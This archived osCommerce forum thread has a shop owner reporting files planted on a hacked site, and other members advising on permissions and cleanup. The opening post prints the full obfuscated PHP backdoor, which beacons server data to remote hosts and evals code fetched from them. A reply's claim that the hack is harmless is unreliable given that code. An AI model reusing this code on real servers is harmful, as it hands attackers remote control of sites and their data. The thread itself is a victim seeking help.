Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Unusual files on catalog/admin directories


Qvomos

Recommended Posts

Hello folks, great Sunday to you all.

I was doing my bi-weekly cleanup and updates to the site and when I noticed several files scattared throughout the catalog/admin directories.

They all php with names like 130283.php (catalog/download) or 86025.php (catalog/images) or 118071.php (catalog/admin/backups)

All have the same code:

================

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){} else if (include(base64_decode("aHR0cDovLw==").base64_decode("c2hvcC52bWFya2V0LmluZm8=")."/?".$str));else if ($c=file_get_contents(base64_decode("aHR0cDovLzcucGhwdGFncy53cy8/").$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLnBocHRhZ3Mud3MvPw==").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>

================

I certainly did not put them in there so I am not sure what's hapenning. Have I been hacked or something?

Any help someone can possibly give would be much appreciated.

Thank you in advance

 

Jayme

Link to comment
Share on other sites

Yes, you're a hack victim.

 

Probably because your images folder has 777 permissions.

 

No web accessible folder should have permissions higher than 755

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

From what I've been able to gather it's not a malicious nor destructive hack.

 

It's a "pay per click" scam.

 

This hack plants these files then seeds search engines with links to these files.

 

Then whomever runs the scam just sits back and gets paid for every click someone uses that leads to these files.

 

It happened to the site I manage back in March.

:blush:

 

Be sure you check ALL your folders for these bogus files.

 

If you change the images folder permissions to 755 and get an error in your osC admin about the images folder not being writable, as far as I know you have two options:

 

1. Use your cpanel to change the permissions to 777 while you're adding/updating categories and products and pray a hacking robot doesn't get you again while you're doing this.

 

2. Install a contribution called "osCFileBrowser". Using this contrib you must upload images in advance to your images folder (via FTP, Cpanel or whatever) and in your admin you have a window to the images folder that will popup and you pick the image.

 

There may be other ways.

 

If you want the link to the contribution I can find it.

 

That's the route I took to solve the problem.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Thanks again Jim.

From what I understand on your note it doesn't sound too malicious in nature.

However I do sell digital downloads and and they are very unique and sought after. I did have one of those files inside the catalog/download folder. Any possibility that my inventory was downloaded?

Thanks again for all the information you have given my.

I have cleaned up all the directories and taken the apropriate measures to ensure this will not happen again, including installation of the mods you suggested.

Thak you too Spax :)

 

Cheers

 

Jayme

Link to comment
Share on other sites

If this is the hack I think it is, it's only purpose is a pay per click scam.

 

I doubt inventory was compromised.

 

If you use Paypal as a payment option there is a way people can trick osC into thinking the download has been paid for and they get the download for free.

 

Just thought I'd toss that in in case you didn't know that.

 

There is a thread around here discussing this very subject.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

I am using PayPal IPN 2.33 and yes I did see this infamous post. I tried it on the site with no success. I belive checkout process is fundamental for this hack to work but some how I wasn't able to bring out the page during my attempts. I could be wrong but I've read the IPN is the key to safeguard against this hack.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...